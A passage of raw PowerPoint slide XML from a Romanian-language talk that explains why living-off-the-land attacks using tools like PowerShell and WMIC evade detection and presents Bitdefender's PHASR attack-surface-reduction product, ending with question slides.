            <a:endParaRPr lang="ro-RO" dirty="0">
              <a:latin typeface="Segoe UI Web (West European)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" rtl="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>Mai puține fișiere înseamnă mai puține indicii pentru instrumentele de securitate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" rtl="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="ro-RO" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Segoe UI Web (West European)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" rtl="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>Procese legitime: Instrumentele de monitorizare văd procese normale, precum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>powershell.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>wmic.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t> – folosite frecvent pentru sarcini administrative. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" rtl="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="ro-RO" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Segoe UI Web (West European)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" rtl="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>Intenție greu de distins: Marea problemă e că multe acțiuni </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>LotL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t> arată la fel ca cele făcute de un administrator legitim. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" rtl="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="ro-RO" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Segoe UI Web (West European)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>Oboseala provocată de alerte în EDR: EDR-urile moderne semnalează modele suspecte (de exemplu, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t>PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Segoe UI Web (West European)"/>
              </a:rPr>
              <a:t> care rulează comenzi codificate sau rundll32 care încarcă DLL-uri neobișnuite). (SUSPECT ≠MALIȚIOS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEFA3B3B-42E6-FBD8-D2D0-A775C8EDD067}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="720725"/>
            <a:ext cx="11425073" cy="568960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0"/>
              <a:t>De </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0" err="1"/>
              <a:t>ce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0"/>
              <a:t> sunt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0" err="1"/>
              <a:t>atacurile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0" err="1"/>
              <a:t>acestea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0" err="1"/>
              <a:t>greu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0" err="1"/>
              <a:t>detectat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CA3481F-91B9-2F8A-75A0-BDDC41C63D7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9704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8448CA-DC0C-2211-92E4-8C83FD0233F6}"/>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8015F75E-55B1-EA06-8B07-8E7E6A12E9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9163" y="1871625"/>
            <a:ext cx="4553760" cy="4706729"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4103" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D869B7C1-C799-924C-2A49-7C1D213843F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412219" y="1871625"/>
            <a:ext cx="5165621" cy="4688973"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Ideea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>bază</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> PHASR nu se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>limitează</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>detectarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>acțiunilor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>malițioase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, ci reduce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>suprafața</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>atac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>disponibilă</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>atacatori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Adaptabil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>și</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>personalizat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> PHASR nu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>aplică</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>politici</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rigide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>toți</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Folosește</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> machine learning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>și</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>analiză</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>comportamentală</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>construi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>profil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> individual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fiecare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>utilizator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>și</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Detectează</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>și</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>previne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> PHASR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>folosește</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>scenarii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>și</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> playbook-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ale </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>atacatorilor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cunoscuți</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> a nu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>doar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>detecta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>activități</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>suspecte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, ci a le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bloca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>în</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>timp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> real, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>înainte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>să</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>extindă</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DB5ECA7-33FE-AEB6-44B7-5D63562B57A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="720725"/>
            <a:ext cx="11425073" cy="568960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3300" dirty="0"/>
              <a:t>Bitdefender PHASR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4105" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D7FB80E-6A37-64B2-EB9A-816817FC4B95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404432" y="1341737"/>
            <a:ext cx="11415086" cy="337718"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Proactive Hardening and Attack Surface Reduction </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="325866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B8324-3CF1-F62B-6DE2-5D78083437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AE2969-D5CD-4406-E9A3-54E2E08A9229}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10972800" y="0"/>
            <a:ext cx="1219200" cy="3918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7" name="Title 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3EC2B96-D834-F1BC-2D21-B742623FB83D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Întrebări</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-RO" sz="3600" b="1">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CD020A9-5AEB-05C3-5FD7-C1E5710765B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380390" y="1091531"/>
            <a:ext cx="8347328" cy="78009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200">
              <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38531037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56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7C6752-E838-C4C2-72F7-C6D5109FA4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956DCBB-B36F-17F0-EF3A-B90A3D322965}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10972800" y="0"/>
            <a:ext cx="1219200" cy="3918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7" name="Title 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED899F61-2790-4345-CD18-B85BF96E7FDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Întrebări</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-RO" sz="3600" b="1">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CE25388-5117-E124-08E2-D5C12607E31E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380390" y="1091531"/>
            <a:ext cx="8347328" cy="78009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200">
              <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1034" name="Picture 10" descr="Squirrel photo">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85027F8F-6C1B-27CD-500E-BEDA53362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8742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0999FD-23B6-870D-3FAF-7A8D3E1135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67559CE-323A-1452-1795-603F3C3D1A78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10972800" y="0"/>
            <a:ext cx="1219200" cy="3918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7" name="Title 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF286636-B72B-77A7-0730-9C9B23E850A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
